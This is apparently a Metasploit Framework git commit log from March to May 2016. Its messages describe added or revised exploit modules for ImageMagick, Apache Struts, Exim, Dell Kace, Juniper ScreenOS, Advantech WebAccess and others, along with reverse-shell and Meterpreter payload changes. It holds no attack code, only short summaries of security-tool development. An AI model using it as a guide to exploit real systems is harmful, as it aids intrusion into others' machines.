William Vu
5c713d9f75
Set default payload
...
Land #6849 for this to be effective.
2016-05-05 14:18:42 -05:00
William Vu
232cc114de
Change placeholder text to something useful
...
A la Shellshock. :)
2016-05-05 14:18:42 -05:00
William Vu
f32c7ba569
Add template generation details
2016-05-05 14:18:42 -05:00
William Vu
23a0517a01
Update description
2016-05-05 14:18:42 -05:00
William Vu
d7b76c3ab4
Add more references
2016-05-05 14:18:42 -05:00
William Vu
5c04db7a09
Add ImageMagick exploit
2016-05-05 14:18:42 -05:00
Adam Cammack
2e460a87dd
Remove extra assignment
2016-05-05 11:24:19 -05:00
David Maloney
891a788ad4
Land #6849, mknod to mkfifo
...
lands wvu's pr to switch from mknod to
mkfifo for netcat payloads
2016-05-05 10:34:41 -05:00
Vex Woo
35a780c6a8
fix send_request_cgi redirection issues #6806
2016-05-05 09:55:32 -05:00
Christian Mehlmauer
9357a30725
remove duplicate key
2016-05-04 22:15:33 +02:00
William Vu
74e5772bbf
Replace mknod with mkfifo for portability
...
Works on BSD and OS X now. This has been bugging me for a while.
2016-05-04 02:32:37 -05:00
HD Moore
779a7c0f68
Switch to the default rails server port
2016-05-03 02:06:58 -05:00
HD Moore
8b04eaaa60
Clean up various whitespace
2016-05-03 02:06:37 -05:00
wchen-r7
68ad9b0b53
Land #6835, support Windows and Java platforms for struts_dmi_exec
2016-05-02 15:04:42 -05:00
wchen-r7
df44dc9c1c
Deprecate exploits/linux/http/struts_dmi_exec
...
Please use exploits/multi/http/struts_dmi_exec, which supports
Windows and Java targets.
2016-05-02 15:03:25 -05:00
Brian Patterson
be363411de
Land #6317, Add delay(with jitter) option to auxiliary scanner and portscan modules
2016-05-02 13:09:40 -05:00
HD Moore
3300bcc5cb
Make msftidy happier
2016-05-02 02:33:06 -05:00
HD Moore
67c9f6a1cf
Add rails_web_console_v2_code_exec, abuse of a debug feature
2016-05-02 02:31:14 -05:00
join-us
6a00f2fc5a
mv exploits/linux/http/struts_dmi_exec.rb to exploits/multi/http/struts_dmi_exec.rb
2016-05-01 00:00:29 +08:00
join-us
ec66410fab
add java_stager / windows_stager | exploit with only one http request
2016-04-30 23:56:56 +08:00
wchen-r7
73ac6e6fef
Land #6831, Add CVE-2016-3081 Apache struts s2_032 DMI Code Exec
2016-04-29 11:53:47 -05:00
wchen-r7
d6a6577c5c
Default payload to linux/x86/meterpreter/reverse_tcp_uuid
...
Default to linux/x86/meterpreter/reverse_tcp_uuid for now because
of issue #6833
2016-04-29 11:52:50 -05:00
join-us
288975a9ce
rm modules/exploits/multi/http/struts_dmi_exec.rb
2016-04-30 00:44:31 +08:00
Security Corporation
9d279d2a74
Merge pull request #15 from wchen-r7/pr6831
...
Changes for Apache struts from @wchen-r7
2016-04-30 00:37:53 +08:00
join-us
15ffae4ae8
rename module name
2016-04-30 00:17:26 +08:00
join-us
1d95a8a76d
rename struts_code_exec_dynamic_method_invocation.rb to struts_dmi_exec.rb
2016-04-30 00:13:34 +08:00
wchen-r7
97061c1b90
Update struts_dmi_exec.rb
2016-04-29 11:13:25 -05:00
join-us
9e56bb8358
send http request (get -> post)
2016-04-30 00:08:00 +08:00
wchen-r7
e9535dbc5b
Address all @FireFart's feedback
2016-04-29 11:03:15 -05:00
wchen-r7
6f6558923b
Rename module as struts_dmi_exec.rb
2016-04-29 10:34:48 -05:00
wchen-r7
2f66442f1d
Fix #5191, bad LHOST format causes shell_to_meterpreter to backtrace
...
When using shell_to_meterpreter via a pivot, the LHOST input's format
might be invalid. This is kind of a design limitation, so first we
check the input, and there is a module doc to go with it to explain
a workaround.
Fix #5191
2016-04-28 23:03:54 -05:00
join-us
643591546e
struts s2_032 rce - linux_stager
2016-04-29 10:49:56 +08:00
wchen-r7
2a91a876ff
Update php/meterpreter_reverse_tcp size
2016-04-27 16:14:38 -05:00
William Vu
c16a02638c
Add Oracle Application Testing Suite exploit
2016-04-26 15:41:27 -05:00
William Vu
0cb555f28d
Fix typo
2016-04-26 15:26:22 -05:00
Adam Cammack
f28d280199
Land #6814, move stdapi to exist?
2016-04-24 13:41:11 -04:00
wchen-r7
4a95e675ae
Rm empty references
2016-04-24 11:46:08 -05:00
wchen-r7
2edd6869fc
rm references key
2016-04-24 03:09:59 -05:00
Brent Cook
194a84c793
Modify stdapi so it also uses exist? over exists? for ruby parity
...
Also add an alias for backward compatibility.
2016-04-23 17:31:22 -04:00
wchen-r7
816bc91e45
Resolve #6807, remove all OSVDB references.
...
OSVDB is no longer a vulnerability database, therefore all the
references linked to it are invalid.
Resolve #6807
2016-04-23 12:32:34 -05:00
Brent Cook
9a873a7eb5
more style fixes
2016-04-23 12:18:28 -04:00
Brent Cook
d86174c3bf
style fixes
2016-04-23 12:18:28 -04:00
Brent Cook
4250725b13
fix incorrect hex port conversion
2016-04-23 12:18:28 -04:00
Brent Cook
7ff5a5fd7e
switch mainframe payloads to fixed size
2016-04-23 11:40:05 -04:00
join-us
81af4d2675
Fix: merge error
2016-04-23 23:19:08 +08:00
join-us
1d99d08ac8
rebuild
2016-04-23 23:15:19 +08:00
join-us
de9ac28db1
class Metasploit4 -> class MetasploitModule
2016-04-23 23:03:48 +08:00
join-us
e2fcfc8d09
fix index / space
2016-04-23 23:02:41 +08:00
join-us
fca4d53a6f
add yahoo_search / bing_search exception handler
2016-04-23 22:58:39 +08:00
join-us
d9633078ec
merge yahoo_search_domain[ip] / bing_search_domain[ip]
2016-04-23 22:45:47 +08:00
join-us
66c0832f27
add Rex::Socket.getaddresses exception handler
2016-04-23 20:09:12 +08:00
join-us
b47b83dfaa
add results.nil? / results.empty? check
2016-04-23 19:47:33 +08:00
join-us
7579abb34e
report_note in a line
2016-04-23 19:43:44 +08:00
join-us
55e31bacee
add exception handler
2016-04-23 19:01:55 +08:00
join-us
73121f7e2f
add vprint_good
2016-04-23 18:50:48 +08:00
join-us
bc1f829fe5
class Metasploit4 -> class MetasploitModule
2016-04-23 17:36:22 +08:00
wchen-r7
da9f156913
Print IP in print_*
2016-04-22 16:03:31 -05:00
wchen-r7
3aa02891e9
Bring #6801 up to date with upstream-master
2016-04-22 14:04:26 -05:00
wchen-r7
4a435e8d13
Bring hp_dataprotector_install_service up to date w/ upstream-master
2016-04-22 13:42:41 -05:00
wchen-r7
db1d973ef0
Cosmetic changes for hp_dataprotector_install_service
2016-04-22 13:41:18 -05:00
join-us
16ff74e293
syntax check / code reduce
2016-04-22 10:53:03 +08:00
Vincent Yiu
ca4bcfe62a
Update enum_emet.rb
...
Cleaned up a bit more
2016-04-22 00:41:10 +01:00
Vincent Yiu
c81d0ade3f
Update, implemented
...
Took @bcook-r7's advice
2016-04-22 00:37:03 +01:00
Vincent Yiu
30ac6b4a93
enum_emet
...
A module to enumerate all the EMET wildcard paths.
2016-04-22 00:20:25 +01:00
dmohanty-r7
67968e912c
Land #6785 Add CVE-2016-0854 Advantech WebAccess Arbitrary File Upload
2016-04-21 12:02:04 -05:00
Brent Cook
57ab974737
File.exists? must die
2016-04-21 00:47:07 -04:00
504137480
c08872144f
Update advantech_webaccess_dashboard_file_upload.rb
2016-04-21 09:33:03 +08:00
504137480
dcb9c83f98
Update advantech_webaccess_dashboard_file_upload.rb
2016-04-21 09:28:42 +08:00
Louis Sato
6b3326eab2
Land #6707, support for LURI handler
2016-04-20 16:26:07 -05:00
wchen-r7
e1e43db551
Land #6789, remove overwritten keys from hashes
2016-04-20 13:33:31 -05:00
Fakhir Karim Reda zirsalem
f0d403124c
Update symantec_brightmail_ldapcreds.rb
2016-04-20 18:58:12 +02:00
Karim Reda Fakhir
cda104920e
delete telisca abuse
2016-04-20 17:09:13 +01:00
Karim Reda Fakhir
c322a4b314
added modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb
2016-04-20 17:01:18 +01:00
Karim Reda Fakhir
dc3a185519
delete modules/auxiliary/voip/telisca_ips_lock_abuse.rb
2016-04-20 16:48:37 +01:00
Josh Hale
57467b94d9
Fix RegExp evaluation in is_routable? function
2016-04-20 10:22:46 -05:00
Karim Reda Fakhir
5adf5be983
add symantec bright mail ldap creds
2016-04-20 16:05:24 +01:00
Brent Cook
57cb8e49a2
remove overwritten keys from hashes
2016-04-20 07:43:57 -04:00
Karim Reda Fakhir
dfb2b95e46
Merge remote-tracking branch 'upstream/master'
...
Merge
2016-04-20 12:21:16 +01:00
Brian Patterson
b74930f5c9
Land #6771, Deprecate dns_bruteforce / dns_cache_scraper / dns_info / dns_reverse_lookup / dns_srv_enum
2016-04-19 16:30:36 -05:00
504137480
2400345fff
Merge pull request #2 from open-security/advantech_webaccess_dashboard_file_upload
...
Advantech webaccess dashboard file upload
2016-04-19 12:59:32 +08:00
join-us
0407acc0ec
add print_status with vuln_version?
2016-04-19 11:22:00 +08:00
join-us
c88ddf1cc4
fix NilClass for res.body
2016-04-19 10:27:20 +08:00
Adam Cammack
3da451795c
Fix potential case issue
...
Even though the options were getting put back in a datastore, the
original case could still be lost and that would be bad.
2016-04-18 17:52:27 -04:00
thao doan
fd603102db
Land #6765, Fixed SQL error in lib/msf/core/exploit/postgres
2016-04-18 10:44:20 -07:00
wchen-r7
89a3755754
Land #6786, post/windows/manage/autoroute improvements
...
Resolve #6781
2016-04-18 12:11:42 -05:00
xiaozhouzhou
a895b452e6
fix
2016-04-19 00:21:26 +08:00
Brent Cook
c596421b01
use generate_uri_uuid_mode for java reverse_http
2016-04-18 08:26:02 -05:00
Tim
edd30e433e
https tweaks
2016-04-18 08:26:02 -05:00
OJ
555352b210
Force lurl string duplication to avoid stageless issues
...
I have NO idea why this is even a problem. Mutating state is the spawn of satan.
2016-04-18 08:25:19 -05:00
OJ
a74a7dde55
More fixies for LURI in Python, and native too
2016-04-18 08:25:19 -05:00
OJ
06d53112e3
Add support for LURI to the java and android payloads
2016-04-18 08:24:41 -05:00
OJ
b95267997d
Fix LURI support for stageless, transport add/change and code tidies
2016-04-18 08:24:41 -05:00
join-us
ce9b692dd8
add print_status
2016-04-18 20:43:39 +08:00
join-us
7143668671
fix version_match
2016-04-18 20:31:32 +08:00
join-us
897238f3ec
identify fingerprint / make the code clear
2016-04-18 19:55:42 +08:00
504137480
7d1095bc08
Update advantech_webaccess_dashboard_file_upload.rb
2016-04-18 11:24:03 +08:00
504137480
47b5398152
Update advantech_webaccess_dashboard_file_upload.rb
2016-04-18 11:05:25 +08:00
Josh Hale
48556483b5
Fix a few comments
2016-04-17 19:16:52 -05:00
Josh Hale
32590c89b7
Add interface name to routing status message
2016-04-17 14:15:50 -05:00
504137480
ae23da39b8
Update advantech_webaccess_dashboard_file_upload.rb
2016-04-17 21:23:45 +08:00
504137480
ab9e988dd4
Update advantech_webaccess_dashboard_file_upload.rb
2016-04-17 21:15:03 +08:00
504137480
6c969b1c3b
Update advantech_webaccess_dashboard_file_upload.rb
2016-04-17 18:49:56 +08:00
Josh Hale
fb7194c125
Work on autoroute.md
2016-04-17 00:04:42 -05:00
xiaozhouzhou
32192d3034
Advantech WebAccess Dashboard Viewer Arbitrary File Upload
...
Advantech WebAccess Dashboard Viewer Arbitrary File Upload
2016-04-17 11:29:06 +08:00
Josh Hale
a5e48b6112
Add default option and clean up comments
2016-04-16 19:50:08 -05:00
Josh Hale
6550e0bc1b
Finish up autoadd_interface_routes
2016-04-16 18:42:41 -05:00
Josh Hale
b3d199c055
Add get_subnet_octet and test
2016-04-16 14:57:39 -05:00
Josh Hale
b1064af082
Initial get_subnet testing
2016-04-16 13:50:15 -05:00
Josh Hale
018e7807fe
Identify routable networks
2016-04-15 22:21:54 -05:00
Josh Hale
e8863ba09d
Initial autoadd_interface_routes work
2016-04-15 22:13:17 -05:00
wchen-r7
a434622d21
Land #6769, Add CVE-2016-1593 Novell ServiceDesk Authenticated Upload
2016-04-15 18:59:37 -05:00
Josh Hale
5f5c330f2b
Initial Testing of Interface Info Gather
2016-04-14 21:59:48 -05:00
wchen-r7
92ef8f4ab3
Land #6751, Correct proftp version check at module runtime
2016-04-14 15:34:53 -05:00
wchen-r7
f1523d0804
Land #6779, Add CVE-2016-1531: Exim "perl_startup" Privilege Escalation
2016-04-14 15:16:50 -05:00
Pedro Ribeiro
8dfe98d96c
Add bugtraq reference
2016-04-14 10:23:53 +01:00
Josh Hale
c39410a070
Fix autoadd problem
2016-04-13 23:31:27 -05:00
Brent Cook
6ce7055130
Land #6737, Added reverse shell JCL payload for z/OS
2016-04-13 22:19:15 -05:00
Brent Cook
09873f2f9c
Land #6717, Add new cmd mainframe payload (generic_jcl) for z/OS
2016-04-13 22:10:23 -05:00
William Vu
252632a802
Use %w{} for a couple things
...
Why not? :)
2016-04-13 19:38:57 -05:00
William Vu
de004d7da3
Line up some hash rockets
2016-04-13 19:32:35 -05:00
William Vu
f8e4253e2f
Add telnet to RequiredCmd
...
Baffles me that cmd/unix/reverse isn't cmd/unix/reverse_telnet.
2016-04-13 18:22:28 -05:00
William Vu
07ee18a62b
Do something shady with the exploit method
...
Hat tip @acammack-r7.
2016-04-13 18:15:17 -05:00
William Vu
43e74fce9e
Add Exim privesc
2016-04-13 17:51:20 -05:00
wchen-r7
c52a6393b2
Land #6773, Add Dell Kace K1000 unauthenticated remote root exploit
2016-04-13 10:20:53 -05:00
wchen-r7
1d1a495a93
Style check
2016-04-13 10:19:57 -05:00
CSendner
2319629dd8
Update comments
2016-04-13 05:03:11 +02:00
Christoph Sendner
4970047198
./modules/post/linux/dos/xen_420_dos.rb
2016-04-13 03:31:02 +02:00
Joshua J. Drake
f73309ef01
Fix the ARM NOP generator after #6762, #6768, and #6644
2016-04-12 14:22:57 -05:00
Brendan Coles
b61175c6b4
Add Dell Kace K1000 unauthenticated remote root exploit
2016-04-12 16:15:37 +00:00
join-us
815a918a72
deprecate auxiliary/gather/dns_srv_enum
2016-04-12 08:44:47 +08:00
join-us
2bbb58d57e
deprecate auxiliary/gather/dns_reverse_lookup
2016-04-12 08:44:21 +08:00
join-us
5e1c540d31
deprecate auxiliary/gather/dns_info
2016-04-12 08:43:50 +08:00
join-us
67f8b309c6
deprecate auxiliary/gather/dns_cache_scraper
2016-04-12 08:43:23 +08:00
join-us
66ec001110
deprecate auxiliary/gather/dns_bruteforce
2016-04-12 08:42:56 +08:00
Jon Hart
ca6beeb676
Land #6187, @join-us' cleanup for enum_dns
2016-04-11 09:50:12 -07:00
Pedro Ribeiro
2dc4539d0d
Change class name to MetasploitModule
2016-04-10 23:27:40 +01:00
Pedro Ribeiro
1fa7c83ca1
Create file for CVE-2016-1593
2016-04-10 23:17:07 +01:00
Brent Cook
99b4d0a2d5
remove more regex-style bool checks
2016-04-09 13:49:16 -05:00
Jon Hart
a37f9c9eda
Clarify note type
2016-04-08 18:35:43 -07:00
Jon Hart
44a98cc36f
Correct overly aggressive style cleanup
2016-04-08 18:00:03 -07:00
Jon Hart
7ce5c07c03
Minor style cleanup
2016-04-08 17:39:32 -07:00
Jon Hart
7c70a554ea
Merge branch 'pr/6187' into pr/fixup-6187 for pre-master merge testing
2016-04-08 16:56:38 -07:00
William Vu
8219766538
Land #6760, llmnr_response TTL fix
2016-04-08 16:45:55 -05:00
wchen-r7
6b4dd8787b
Fix #6764, nil SQL error in lib/msf/core/exploit/postgres
...
Fix #6764
2016-04-08 15:20:04 -05:00
wchen-r7
28875313be
Change class name to MetasploitModule
2016-04-08 14:27:52 -05:00
wchen-r7
ae46b5a688
Bring #6417 up to date with upstream-master
2016-04-08 13:41:40 -05:00
Brent Cook
5839e2e3a8
Land #6762, Fix ghetto true/false checking in NOP generator
2016-04-07 19:38:24 -05:00
William Vu
068cf8eba1
Fix ghetto true/false checking in NOP generator
2016-04-07 18:23:33 -05:00
wchen-r7
cba7353e1d
Fix another typo?
2016-04-07 17:12:11 -05:00
wchen-r7
ff9d94218d
Fix a typo?
2016-04-07 17:11:42 -05:00
wchen-r7
a3c390ee9d
Change class name to MetasploitModule
2016-04-07 17:11:08 -05:00
wchen-r7
f09637a1c7
Bring #6377 up to date with upstream-master
2016-04-07 17:06:49 -05:00
wchen-r7
0d3eb4f055
Change class name to MetasploitModule
2016-04-07 12:15:32 -05:00
wchen-r7
0f56dbd858
Bring #6378 up to date with upstream-master
2016-04-07 12:10:55 -05:00
wchen-r7
c4aac2a54a
Remove unwanted comments
2016-04-07 11:22:57 -05:00
Sonny Gonzalez
fa5acba400
TTL setting honors TTL option
...
* change hard-coded ttl value to TTL option
* set TTL option default to 30
2016-04-07 10:59:05 -05:00
James Lee
7658014fb7
Add CVEs
2016-04-07 08:39:29 -05:00
James Lee
87d59a9bfb
Add exploit for ExaGrid known credentials
2016-04-07 04:17:43 -05:00
wchen-r7
e78e12f295
Land #6515, Autoadd for /post/windows/manage/autoroute
2016-04-06 15:29:58 -05:00
wchen-r7
ac051bda7f
Add check is_routable?, and change netmask if needed
2016-04-06 15:28:54 -05:00
William Vu
11bf1018aa
Fix typo
2016-04-06 14:20:41 -05:00
wchen-r7
d240e0b3a2
Bring #6515 up to date with upstream-master
2016-04-06 11:27:32 -05:00
all3g
616bb8399f
remove db_filter / format a json data
2016-04-06 18:39:34 +08:00
William Vu
a4ef9980f4
Land #6677, atutor_sqli update
2016-04-05 19:52:44 -05:00
William Vu
d9d257cb1a
Fix some things
2016-04-05 19:23:11 -05:00
greg.mikeska@rapid7.com
08736c798d
Correct proftp version check at module runtime
2016-04-05 13:06:10 -05:00
William Vu
dcb6da306c
Land #6720, SSL scanner fixes
2016-04-04 23:37:52 -05:00
Brent Cook
af7eef231c
Fix a few issues with the SSL scanner
...
First, we need to handle public keys with strength not measured on the same bit
scale as RSA keys. This fixes handshakes for ECDSA and others.
Second, depending on the host we are talking to, we may not have a peer cert.
Handle this properly by checking first on the socket before using it.
2016-04-04 22:08:01 -05:00
wchen-r7
51b8b4a4d1
Bring #6404 up to date with upstream-master
2016-04-04 16:35:58 -05:00
wchen-r7
da3388248a
Uses #blank?
2016-04-04 16:34:49 -05:00
wchen-r7
5a6d1ee0a9
Uses MetasploitModule class name
2016-04-04 16:30:55 -05:00
William Vu
2e1e1ca839
Land #6742, psexec_psh restoration
2016-04-01 13:59:09 -05:00
William Vu
d23a1c4551
Bump deprecation date
2016-04-01 13:57:58 -05:00
William Vu
60bee16e8c
Restore psexec_psh
...
See @jabra-'s comments on #6222.
2016-04-01 13:56:22 -05:00
William Vu
41b802a8a2
Clean up module
2016-04-01 13:54:27 -05:00
Bigendian Smalls
6a4d7e3b58
Revshell cmd JCL payload for z/OS
...
Added a JCL-based reverse shell. Uses the same source code as the
shellcode version does. Source code is in
external/source/shellcode/mainframe/shell_reverse_tcp.s
2016-03-31 20:42:42 -05:00
wchen-r7
ae0aecdd03
Change class name for exploits/windows/ftp/pcman_put.rb
2016-03-31 19:36:02 -05:00
wchen-r7
de0e02549c
Bring #6507 up to date with upstream-master
2016-03-31 19:30:45 -05:00
wchen-r7
f3336c7003
Update windows/http/easyfilesharing_seh
2016-03-31 19:24:06 -05:00
wchen-r7
dd83757966
Bring #6488 up to date with upstream-master
2016-03-31 19:11:11 -05:00
wchen-r7
75ebd08153
Land #6731, Add CVE-2015-7755 juniper backdoor
2016-03-31 17:30:38 -05:00
wchen-r7
618f379488
Update auxiliary/scanner/redis/redis_server and mixin
2016-03-31 17:14:49 -05:00
wchen-r7
4d76b0e6a5
Rm auxiliary/scanner/misc/redis_server
...
Please use auxiliary/scanner/redis/redis_server or
auxiliary/scanner/redis/redis_login instead
2016-03-31 17:13:08 -05:00
wchen-r7
2e7d07ff53
Fix PASSWORD datastore option
2016-03-31 17:12:00 -05:00
wchen-r7
545cb11736
Bring #6409 up to date with upstream-master
2016-03-31 17:00:56 -05:00
wchen-r7
5fdea91e93
Change naming
2016-03-31 17:00:29 -05:00
wchen-r7
f33e994050
Delete anything related to configuring/saving username
2016-03-31 16:56:54 -05:00
Brent Cook
1ea7cf27a3
remove StackAdjustment from psexec
2016-03-30 23:38:46 -05:00
wchen-r7
101775a5ba
Bring #6545 up to date with upstream-master
2016-03-30 16:07:24 -05:00
thao doan
82cec68606
Land #6427, removes the deprecated psexec_psh module; please use exploit/windows/smb/psexec instead
2016-03-30 12:58:43 -07:00
William Vu
dee9adbc50
Remove deprecated psexec_psh module
2016-03-30 14:35:47 -05:00
wchen-r7
4074634a13
Land #6713, Add post exploit module for HeidiSQL's stored passwords
2016-03-30 12:10:30 -05:00
wchen-r7
0c6b4d81c8
More proper exception handling
2016-03-30 12:09:40 -05:00
wchen-r7
aaa1515ba0
Print rhost:rport
2016-03-30 11:56:09 -05:00
wchen-r7
c7e63c3452
Land #6694, Add Apache Jetspeed exploit
...
CVE-2016-0710
CVE-2016-0709
2016-03-30 11:17:21 -05:00
wchen-r7
74f25f04bd
Make sure to always print the target IP:Port
2016-03-30 11:16:41 -05:00
Meatballs
397d5580be
Use MetasploitModule convention
2016-03-30 15:44:37 +01:00
Meatballs
f8628e3438
Merge remote-tracking branch 'upstream/master' into wdigest_enable
2016-03-30 15:44:21 +01:00
Meatballs
9e45f0c104
Minor tidies
2016-03-30 15:29:03 +01:00
h00die
7fc2c860e9
remove comment
2016-03-29 21:26:36 -04:00
h00die
d35b5e9c2a
First add of CVE-2015-7755
2016-03-29 21:20:12 -04:00
Brent Cook
85ab9d38f7
Land #6698, Add ATutor 2.2.1 Directory Traversal Exploit
2016-03-29 15:42:58 -05:00
Brendan Watters
b84bf2290f
Land #6707 Print Response fix for HTTP NTLM
2016-03-29 13:35:49 -05:00
Brendan Watters
824a7837a2
LAND #6707, Print Response Fix for HTTP NTLM
2016-03-29 13:08:43 -05:00
Bigendian Smalls
a6518b5273
Add generic JCL cmd payload for z/OS (mainframe)
...
This payload does nothing but return successfully. It can be used to
test exploits and as a basis for other JCL cmd payloads.
2016-03-28 21:01:39 -05:00
Hans-Martin Münch (h0ng10)
976932ed43
Initial commit
2016-03-26 12:00:25 +01:00
wchen-r7
57984706b8
Resolve merge conflict with Gemfile
2016-03-24 18:13:31 -05:00
William Vu
2b90846268
Add Apache Jetspeed exploit
2016-03-23 19:22:32 -05:00
dmohanty-r7
6a462d5f60
Land #6703, Make ms09_065_eot_integer passive
2016-03-23 13:39:41 -05:00
Adam Cammack
8fb55eeb6b
Land #6700, add aux module to gather browser info
2016-03-23 13:19:27 -05:00
wchen-r7
8c5c0086e6
Change cve_2012_6301 module path & make passive
...
This addresses two things:
1. The module is in the wrong directory. dos/http is for http
servers, not browsers.
2. PassiveActions should not be a 2D array.
2016-03-23 11:10:23 -05:00
wchen-r7
53860bef1f
Make ms09_065_eot_integer passive
...
MS-932
2016-03-23 10:50:24 -05:00
wchen-r7
8bf039a69e
ignore_items! should not be used in a loop
...
because it's not necessary.
2016-03-22 15:56:38 -05:00
wchen-r7
102d28bda4
Update atutor_filemanager_traversal
2016-03-22 14:44:07 -05:00
wchen-r7
9cb43f2153
Update atutor_filemanager_traversal
2016-03-22 14:42:36 -05:00
wchen-r7
8836393cb1
Add aux module to gather browser information.
2016-03-22 13:56:12 -05:00
Lexus89
8028a9b5ce
Print response fix
2016-03-22 18:50:25 +01:00
Steven Seeley
3842009ffe
Add ATutor 2.2.1 Directory Traversal Exploit Module
2016-03-22 12:17:32 -05:00
h00die
ebc7316442
Spelling Fix
...
Fixed Thorugh to Through
2016-03-19 13:58:13 -04:00
Adam Cammack
570221379e
Land #6533, move ie_unsafe_scripting to BES
2016-03-18 11:22:44 -05:00
James Lee
d54bbdf9a3
Land #6566, filezilla xml file locations
2016-03-17 16:27:24 -05:00
James Lee
115a033036
Fix parsing the Last Server xml
2016-03-17 16:27:02 -05:00
wchen-r7
31279291c2
Resolve merge conflict for ie_unsafe_scripting.rb
2016-03-17 14:42:36 -05:00
wchen-r7
b1b68294bb
Update class name
2016-03-17 14:41:23 -05:00
wchen-r7
7b2d717280
Change ranking to manual and restore BAP2 count to 21
...
Since the exploit requires the target to be configured manually,
it feels more appropriate to be ManualRanking.
2016-03-17 14:39:28 -05:00
James Lee
1375600780
Land #6644, datastore validation on assignment
2016-03-17 11:16:12 -05:00
Brent Cook
e9f87d2883
Land #6685, ensure platform variable is set for non-osx
2016-03-17 08:25:42 -05:00
James Lee
9e7a330ac8
OptInt -> OptPort
2016-03-16 15:47:29 -05:00
James Lee
af642379e6
Fix some OptInts
2016-03-16 14:13:18 -05:00
James Lee
c21bad78e8
Fix some more String defaults
2016-03-16 14:13:18 -05:00
Spencer McIntyre
4e3a188f75
Land #6401, EasyCafe server file retrieval module
2016-03-16 13:24:54 -04:00
Spencer McIntyre
9ac4ec4bfc
Update the class name to MetasploitModule
2016-03-16 13:22:06 -04:00
Spencer McIntyre
53f1338ad0
Update module to remove references to print peer
2016-03-16 13:10:39 -04:00
Brent Cook
1769bad762
fix FORCE logic
2016-03-16 09:53:09 -05:00
Brent Cook
d70308f76e
undo logic changes in adobe_flas_otf_font
2016-03-16 09:52:21 -05:00
Tim
f83cb4ee32
fix set_wallpaper
2016-03-16 13:07:41 +00:00
wchen-r7
5ef8854186
Update ATutor - Remove Login Code
2016-03-15 17:37:37 -05:00
Adam Cammack
05f585157d
Land #6646, add SSL SNI and unify SSLVersion opts
2016-03-15 16:35:22 -05:00
l0gan
e29fc5987f
Add missing stream.raw for hp_sitescope_dns_tool
...
This adds the missing stream.raw.
2016-03-15 11:06:06 -05:00
rwhitcroft
c12cc10416
change class Metasploit to MetasploitModule
2016-03-14 17:57:29 -04:00
rwhitcroft
dd53625f4a
change Metasploit3 to Metasploit to satisfy travis
2016-03-14 16:52:02 -04:00
rwhitcroft
a26c90fd41
fix RPORT option
2016-03-14 16:27:44 -04:00
wchen-r7
38153d227c
Move apache_karaf_command_execution to the SSH directory
...
apache_karaf_command_execution does not gather data, therefore
it is not suitable to be in the gather directory.
2016-03-14 00:32:59 -05:00
William Vu
6323f7f872
Fix a couple overlooked issues
2016-03-13 23:35:05 -05:00
Brent Cook
df0ff30468
Land #6642, make ipv6_neighbor_router_advertisement discovery smarter
2016-03-13 16:53:11 -05:00
Brent Cook
635e31961a
generate valid prefixes
2016-03-13 16:44:57 -05:00
Brent Cook
cd84ac37d6
Land #6569, check if USERNAME env var exists before using in enum_chrome post module
2016-03-13 15:12:51 -05:00
Brent Cook
a50b21238e
Land #6669, remove debug code from apache_roller_ognl_injection that breaks Windows
2016-03-13 14:14:10 -05:00
Brent Cook
23eeb76294
update php_utility_belt_rce to use MetasploitModule
2016-03-13 13:59:47 -05:00
Brent Cook
a6316d326e
Land #6662, update disclosure date for php_utility_belt_rce
2016-03-13 13:58:04 -05:00
Brent Cook
c89e53d0a3
Land #6666, fix filezilla_server display bug showing the session ID
2016-03-13 13:56:44 -05:00
Brent Cook
dabe5c8465
Land #6655, use MetasploitModule as module class name
2016-03-13 13:48:31 -05:00
wchen-r7
b22a057165
Fix #6554, hardcoded File.open path in apache_roller_ognl_injection
...
The hardcoded File.open path was meant for debugging purposes during
development, but apparently we forgot to remove it. This line causes
the exploit to be unusable on Windows platform.
Fix #6554
2016-03-11 18:48:17 -06:00
wchen-r7
51cdb57d42
Fix #6569, Add a check for USERNAME env var in enum_chrome post mod
...
Fix #6569
Depending on the context, the USERNAME environment variable might
not always be there.
2016-03-11 15:36:44 -06:00
James Lee
8217d55e25
Fix display issue when SESSION is -1
2016-03-11 11:37:22 -06:00
Jay Turla
8953952a8f
correction for the DisclosureDate based on Exploit-DB
2016-03-11 14:05:26 +08:00
James Barnett
7009682100
Landing #6659, Fix bug in MS08-067 related to incorrect service pack identification when fingerprinting
2016-03-10 14:29:29 -06:00
William Vu
8d22358892
Land #6624, PHP Utility Belt exploit
2016-03-09 14:12:45 -06:00
William Vu
52d12b68ae
Clean up module
2016-03-09 14:08:26 -06:00
wchen-r7
179d38b914
Fix #6658, MS08-067 unable to find the right target for W2k3SP0
...
Fix #6658.
When there is no service pack, the
Msf::Exploit::Remote::SMB#smb_fingerprint_windows_sp method returns
an empty string. But in the MS08-067 exploit, instead of checking an
empty string, it checks for "No Service Pack", which causes it to
never detect the right target for Windows Server 2003 SP0.
2016-03-09 11:05:34 -06:00
Fakhri Zulkifli
45c7e4b6ae
Update ipv6_neighbor_router_advertisement.rb
2016-03-09 11:21:24 +08:00
Fakhri Zulkifli
e417909111
Update ipv6_neighbor_router_advertisement.rb
2016-03-09 11:21:07 +08:00
rwhitcroft
f155477edf
improve description and change behavior to keep trying on connection errors
2016-03-08 12:33:17 -05:00
Christian Mehlmauer
3123175ac7
use MetasploitModule as a class name
2016-03-08 14:02:44 +01:00
wchen-r7
c2f99b559c
Add documentation for auxiliary/scanner/http/tomcat_enum
...
Also fix a typo in normalizer
2016-03-07 15:39:15 -06:00
Brent Cook
f703fa21d6
Revert "change Metasploit3 class names"
...
This reverts commit 666ae14259.
2016-03-07 13:19:55 -06:00
Brent Cook
44990e9721
Revert "change Metasploit4 class names"
...
This reverts commit 3da9535e22.
2016-03-07 13:19:48 -06:00
Brent Cook
0e46cc0259
Revert "change remaining class names"
...
This reverts commit 62217fff2b.
2016-03-07 13:19:42 -06:00
Brent Cook
aa5b201427
Revert "revert ssl_login_pubkey for now"
...
This reverts commit 7d773b65b6.
2016-03-07 13:19:33 -06:00
Christian Mehlmauer
7d773b65b6
revert ssl_login_pubkey for now
2016-03-07 14:44:23 +01:00
Christian Mehlmauer
62217fff2b
change remaining class names
2016-03-07 09:58:21 +01:00
Christian Mehlmauer
3da9535e22
change Metasploit4 class names
2016-03-07 09:57:22 +01:00
Christian Mehlmauer
666ae14259
change Metasploit3 class names
2016-03-07 09:56:58 +01:00
Brent Cook
bb36cd016e
Fix #6643, Pcap.lookupaddrs does not exist
2016-03-06 22:15:39 -06:00
Brent Cook
eea8fa86dc
unify the SSLVersion fields between modules and mixins
...
Also actually handle the 'Auto' option that we had in the crawler and remove
hardcoded defaults in modules that do not need them.
